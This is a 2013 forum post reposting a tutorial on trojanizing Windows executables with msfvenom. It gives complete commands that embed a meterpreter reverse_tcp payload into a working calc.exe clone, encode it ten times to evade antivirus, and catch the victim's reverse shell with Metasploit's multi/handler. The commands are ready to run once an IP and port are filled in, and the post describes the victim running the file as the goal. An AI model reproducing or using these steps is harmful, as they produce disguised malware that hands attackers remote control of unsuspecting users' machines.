Praetorian503 Posted February 16, 2013 Report Posted February 16, 2013 Description: Today I am going to show you how to backdoor executables using msfvenom. This is a very handy tool in exploitaion.What is MSFVenom?MSFVEnom is a combination of MSFPayload and MSFEncode. It is a all in one framework that makes us easy in creating backdoor executables. In this tutorial I will backdoor calc.exe in a Windows XP SP2 system. I will use a reverse connection back to my back track machine. Our template is calc.exe and we will encode using x86/shikata_ga_nai encoder (I normally use this, you can use what ever you like) and encode this 10 times. So this will the parameter of using msfvenom.msfvenom -p windows/meterpreter/reverse_tcp LHOST= [ your local ip ] LPORT=[ your local port ] -x calc.exe -k -e x86/shikata_ga_nai -i 10 -f exe > calc_backdoor.exeI will break it down and exlain this for you. -p stands for our payload here i have used a meterpreter reverse connection which is awesome to use. LHOST is your local IP and LPORT is your local open port listening. -x is the template we are going to use or simply our custom executable. -k we use this option to start our payload in a new thread otherwise our win32 executable won't load into memory instead the payload will only be executed. -e is the encoder to use you can use whatever you like, you can view all the encoders in the metasploit framework by typing 'show encoders'. Encoders are important in evading AVs but this is not perfect as we think, the best way is to write our custom encoders for better results.-i stand for iteration or our count, how many times we would encode. -f is the format we are going to use so in my case I will use exe as the format.So that's it from the creation of our backdoor. Now we will launch Metasploit and use exploit/multihandler. This is a stub that handles exploits launched outside our framework. As our backdoor listens to the specified settings we have to give the same payload, same local host and same port which we used at the creation of our backdoor. so that's it run exploit and msf will start listening.Okay now lets dump our created backdoor which works fine as a calculator , just like a clone of calculator. Once the victim runs our infected calc.exe we should get a nice meterpreter revserse connection . So that's it the box is pwned.We can create the same backdoor by piping msfencode into msfpayload which results a very long parameter and difficult to memorize the commands.msfpayload windows/meterpreter/reverse_tcp LHOST=[ your local ip ] LPORT=[ your local ip ] R | msfencode -e x86/shikata_ga_nai -c 10 -o calc_backdoor.exe -t exe -x calc.exe -kSo by using MSFVenom easily we can generate payload along with encoding in a simple manner. I hope you learnt something useful.Thank you.Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.Original Source: Source: Making Backdoors With Msfvenom 1 Quote